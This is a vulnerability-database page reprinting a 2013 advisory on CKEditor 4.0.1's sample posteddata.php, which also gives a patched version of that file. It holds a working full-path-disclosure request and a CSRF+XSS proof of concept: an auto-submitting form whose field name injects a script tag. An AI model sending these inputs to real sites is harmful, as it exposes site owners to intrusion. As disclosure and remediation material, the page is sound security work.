Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CKEditor 4.0.1 多个安全漏洞

🗓️ 22 Feb 2013 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 360 Views

CKEditor 4.0.1 安全漏洞包括路径披露和XS

Code

                                                ===========================================
Vulnerable Software: ckeditor 4.0.1 standard
Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulns: Full Path Disclosure && XSS
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable Code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================

root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
        <meta charset="utf-8">
        <title>Sample — CKEditor</title>
        <link rel="stylesheet" href="sample.css">
</head>
<body>
        <h1 class="samples">
                CKEditor — Posted Data
        </h1>
        <table border="1" cellspacing="0" id="outputSample">
                <colgroup><col width="120"></colgroup>
                <thead>
                        <tr>
                                <th>Field Name</th>
                                <th>Value</th>
                        </tr>
                </thead>
<?php

if ( isset( $_POST ) )
        $postArray = &$_POST ;                  // 4.1.0 or later, use $_POST
else
        $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
        if ( get_magic_quotes_gpc() )
                $postedValue = htmlspecialchars( stripslashes( $value ) ) ;
        else
                $postedValue = htmlspecialchars( $value ) ;

?>
                <tr>
                        <th style="vertical-align: top"><?php echo $sForm?></th>
                        <td><pre class="samples"><?php echo $postedValue?></pre></td>
                </tr>
        <?php
}
?>
        </table>
        <div id="footer">
                <hr>
                <p>
                        CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
                </p>
                <p id="copy">
                        Copyright © 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
                </p>
        </div>
</body>
</html>


=============SNIP ENDS HERE====================



FULL Path Disclosure example: 

URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST

HEADERS:

Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30



$_POST DATA TO SEND:


bangbangbang[]=PATH DISCLOSURE




Result: 
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png


=================================================

CSRF+XSS
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>

=================================================

Print Screen:  http://i062.radikal.ru/1302/e6/25ef023dd589.png



=================================================
And here is fixed version:  /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
  <meta charset="utf-8">
  <title>Sample — CKEditor</title>
  <link rel="stylesheet" href="sample.css">
</head>
<body>
  <h1 class="samples">
    CKEditor — Posted Data
  </h1>
  <table border="1" cellspacing="0" id="outputSample">
    <colgroup><col width="120"></colgroup>
    <thead>
      <tr>
        <th>Field Name</th>
        <th>Value</th>
      </tr>
    </thead>
<?php

if ( isset( $_POST ) )
  $postArray = &$_POST ;      // 4.1.0 or later, use $_POST
else
  $postArray = &$HTTP_POST_VARS ;  // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
  if ( get_magic_quotes_gpc() )
    $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
  else
  $postedValue =htmlspecialchars((string) $value ) ;

?>
    <tr>
      <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>
      <td><pre class="samples"><?php echo $postedValue?></pre></td>
    </tr>
  <?php
}
?>
  </table>
  <div id="footer">
    <hr>
    <p>
      CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
    </p>
    <p id="copy">
      Copyright © 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
    </p>
  </div>
</body>
</html>

=============ENJOYYY====================

               KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
===========================================

/AkaStep

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Feb 2013 00:00Current
7.1High risk
Vulners AI Score7.1
ckeditor 4.0.1安全漏洞路径披露xssdebian squeeze 6.0.6apache/2.2.16mysql 5.1.66-0+squeeze1php 5.3.3-7+squeeze14apache traffic server 3.2.0full path disclosure$_postfull path disclosureposted data
360